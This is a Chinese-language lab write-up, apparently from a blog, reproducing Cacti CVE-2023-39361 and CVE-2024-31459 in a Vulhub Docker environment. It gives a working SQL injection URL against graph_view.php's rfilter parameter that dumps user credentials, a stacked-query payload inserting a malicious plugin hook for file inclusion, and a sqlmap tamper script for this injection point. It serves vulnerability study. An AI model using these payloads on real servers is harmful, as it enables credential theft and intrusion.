Vulhub 中的 Cacti-CVE-2023-39361

0x00 前言

先学习一下背景吧,Cacti是一个全面的网络图形化解决方案,旨在利用RRDTool的数据存储和图形功能,为网络管理员提供直观的界面来监控和分析网络性能数据。

在Cacti 1.2.24及更早版本中,graph_view.php文件存在一个严重的漏洞,当启用guest用户时,未经任何身份验证的攻击者通过'rfilter'参数即可执行SQL注入攻击,最终可能导致远程代码执行。

0x01 环境搭建

使用docker搭建环境。

复制代码
sudo docker compose up -d

访问环境。用户名/密码:admin/admin

复制代码
http://localhost:8080

一路确定下来之后,进行设置。需要开启guest用户才能进行复现。

0x02 CVE-2023-39361

首先nmap扫描一下端口。

目前已知条件有ip和端口,那接下来扫描一下后台。

访问一下。

抓个包构造poc。

复制代码
http://192.168.217.166:8080/graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=aaaaaaa"%20OR%20""="(("))%20UNION%20SELECT%201,2,(select%20concat(id,0x23,username,0x23,password)%20from%20user_auth%20limit%201),4,5,6,(select%20user()),(select%20version()),9,10%23

已经在回显中看到对应的用户名和密码。

但是没解码出来,至今也不知道密码是啥。用sqlmap也没跑出来,shell也没拿到。

0x03 CVE-2024-31459

原理是:由于Cacti支持堆叠查询,可以利用CVE-2023-39361结合CVE-2024-31459实现本地文件包含。

那在上一个包的基础上,修改一下payload。

复制代码
http://192.168.2.166:8080/graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=aaaaa"%20OR%20""="(("));INSERT%20INTO%20plugin_hooks(name,hook,file,status)%20VALUES%20(".","login_before","../log/cacti.log",1);%23

原理是把hooks插入到/log/cacti.log中,将api_plugin_hook() 函数直接从数据库的 plugin_hooksplugin_config 表中读取数据,并将其拼接为文件路径进行包含操作。

这种设计缺乏对输入的有效验证,攻击者可以通过精心构造的输入实现恶意文件的包含。结合 SQL 注入漏洞,攻击者能够操控数据库内容,从而进一步利用文件包含漏洞执行任意代码。

接下来修改payload,利用updatexml函数触发SQL报错,在错误信息中显示注入的PHP代码,验证注入有效性。

那么是不是可以再修改payload写入木马呢?

访问一下。

不太行。

改用system函数也不太行。

直接sqlmap一把梭。

一开始是跑不到,问了大佬发现注入点的问题,于是参考大佬的脚本修改了一下,由于大佬用的python和我的python版本不一样,因此优化了一下。

复制代码
#!/usr/bin/env python
# coding: utf-8

from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Wraps payload for a specific double RLIKE injection.
    
    It closes the first RLIKE with a quote, injects a UNION query, 
    and comments out the rest of the SQL statement.
    This tamper script is specifically designed for the described scenario.
    Example:
    >>> tamper('1 UNION SELECT 1,2,3')
    '" OR ""="(("))UNION SELECT 1,2,3#'
    """
    
    if payload:
        # Python 2 兼容写法:使用字符串拼接而非 f-string
        retVal = '" OR ""="(("))' + payload + '#'
        return retVal
    else:
        return payload

虽然能跑动了,但是也没跑出来结果,拿不到shell。

0x04 总结

这个漏洞研究了几个星期,确实没有拿到shell,很遗憾,先记录下来,后面慢慢研究,如果师傅们有思路还请不吝赐教。

相关推荐
Waay10 小时前
“红帽系统管理二”知识点问答题:第11章 管理网络安全
网络·安全·web安全
sweet丶14 小时前
加密算法、摘要指纹、签名、CA证书全面梳理笔记
安全
他是龙55116 小时前
71:Python安全 & 反序列化 & PYC反编译 & 格式化字符串安全
开发语言·python·安全
幸福巡礼18 小时前
【LangChain 1.2 实战(八)】Agent Middleware 实战 —— 动态路由、监控、安全与容错
java·安全·langchain
xixixi7777718 小时前
深度解读:网信办“清朗·整治AI应用乱象”专项行动,AI产业告别野蛮生长,全面迈入合规治理深水区
人工智能·安全·ai·大模型·合规·深度伪造·网信办
weixin_lizhao19 小时前
50天独立打造企业级API网关(二):安全防护体系与弹性设计
java·spring boot·安全·spring cloud·gateway
記億揺晃着的那天19 小时前
Claude Code 系统提示词里的安全底线:OWASP Top 10
安全·ai·ai编程·vibe coding·claude code
重明链迹实验室20 小时前
重明链迹丨每周区块链安全要闻(0427-0503)
安全·web3·区块链
百度安全21 小时前
HugeGraph 晋升 Apache 顶级项目 百度安全持续筑牢 AI 时代图数据基础设施
数据库·人工智能·安全·知识图谱